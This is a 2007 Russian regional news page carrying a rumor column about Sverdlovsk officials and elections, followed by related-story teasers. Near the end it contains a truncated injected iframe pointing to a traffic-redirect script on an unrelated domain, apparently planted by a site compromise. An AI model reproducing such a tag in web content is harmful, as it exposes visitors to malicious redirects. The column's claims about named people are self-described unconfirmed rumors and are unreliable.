30.11.2007, 15:09

Слухи и версии, 30 ноября

Чиновники лишились полноценных выходных
Говорят, что свердловские чиновники всех уровней в предстоящий уик-энд лишатся полноценных выходных. Даже без специальных указаний из вышестоящих инстанций большинство из них предпочли не отлучаться из своих муниципальных образований.
По неофициальной информации, такая самоотверженность объясняется просто: если, не дай бог, явка в Свердловской области окажется недостаточной, всех руководящих работников бросят на ее повышение, как это уже бывало не раз.
Впрочем, как уверяет целый ряд слухмейкеров из разного рода «домов», их руководству в любом случае в предстоящие два дня было бы не до отдыха, слишком велики опасения за те оргвыводы, которые могут быть сделаны Москвой в случае неблагоприятного исхода голосования, а значит, и настроение для увеселений совсем не подходящее.
Владимир Туринский 2 года не может расплатиться с коммерсантами
Говорят, что министр социальной защиты Владимир Туринский может оказаться в центре серьезнейшего скандала. Как уверяют слухмейкеры, уже 2 года Туринский не может забрать со склада одной из типографий Екатеринбурга заказанные министерством бланки удостоверений ветерана труда. По слухам, речь идет о 80 тысячах «корочек».
По неофициальной информации, коммерсанты уже отчаялись получить с Владимира Туринского деньги за исполненный заказ, однако не знают, что делать с готовой продукцией. Выбрасывать ее на свалку полиграфисты сочли некорректным, при этом им уже стали поступать предложения продать бланки от разного рода политических и хозяйствующих структур. Как данные деятели могут воспользоваться удостоверениями, предприниматели даже не представляют.
Валерий Черешнев лишится поста руководителя УрО РАН
Говорят, что вскоре после выборов академик Валерий Черешнев, ныне возглавляющий Уральское отделение Российской академии наук, лишится своего поста. По неофициальной информации, это связано как с внутриакадемическими пертурбациями, так и с политической деятельностью академика.
Как уверяют федеральные слухмейкеры, с принятием после долгой борьбы с федеральным правительством нового устава в академии наук ее руководством параллельно принято решение о начале процесса омоложения, в том числе в региональных отделениях РАН.
Говорят, что положение Валерия Черешнева по сравнению с другими его возрастными коллегами в регионах дополнительно осложняется политическими обстоятельствами. Участие академика в избирательном списке «Справедливой России» лишило его шансов на поддержку в элитах.
Свердловские депутаты уже готовятся к выборам президента
Говорят, что Свердловская областная дума фактически проигнорирует работу в новом году. Как утверждают завсегдатаи думских кулуаров, парламентское большинство заранее решило пожертвовать сессиями ради участия в предвыборной кампании неизвестного пока преемника и своей собственной.
По неофициальной информации, в январе народные избранники соберутся всего один раз, а в феврале пленарных заседаний, скорее всего, не будет вовсе.
У Марии Серовой появился еще один «преемник»
Говорят, что количество желающих поработать министром финансов Свердловской области увеличилось еще на одного человека. Как уверяют слухмейкеры, статус «преемника» главного распорядителя деньгами области примерил на себя председатель бюджетного комитета областной думы Владимир Терешков.
По неофициальной информации, народный избранник, срок полномочий которого заканчивается в марте, обоснованно сомневается в том, что ему удастся попасть в избирательный список «единороссов», так как качеством работы Терешкова остались не удовлетворены слишком многие влиятельные персоны как в исполнительной, так и в законодательной власти. Поэтому он решил добиться своего перевода в Минфин.
Правда скептики полагают, что сделать это Владимиру Андреевичу будет непросто, так как его познания в современной бюджетной системе, даже спустя 4 года работы руководителем комитета по бюджету, не впечатляют слишком многих.
<iframe src="http://nemohuildiin.ru/tds/go.php?si

Похожие новости по теме
03.06.2011, 16:18

Слухи и версии, 03 июня

Евгений Куйвашев может доставить областным властям немало хлопот Говорят, что должность так называемого «инвестиционного уполномоченного», которую занял заместитель Николая Винниченко Евгений...

29.01.2010, 16:24

Слухи и версии, 29 января

Александр Мишарин в шоке от положения дел в области Говорят, что по итогам уже первых своих поездок по городам и весям губернатор Александр Мишарин пришел в шок от состояния дел в глубинке. По...

17.04.2009, 15:46

Слухи и версии, 17 апреля

«Единой России» запретили принимать перебежчиков Говорят, что из Москвы в региональные организации «Единой России» спущена инструкция о недопустимости включения в избирательные списки перебежчиков из...

22.02.2008, 16:00

Слухи и версии, 22 февраля

Свердловские «единороссы» уже празднуют победу Говорят, что в одной из типографий Екатеринбурга уже печатаются благодарственные письма участникам кампании «Единой России». По неофициальной...

25.01.2008, 16:00

Слухи и версии, 25 января

Власти встревожены апатией электората Говорят, что свердловские власти всерьез обеспокоены данными соцопросов по предстоящим выборам. Как уверяют слухмейкеры, данные о количестве избирателей, твердо...


Мастрид
Погода на неделю
Популярные новости
Новости по дням
Новости по месяцам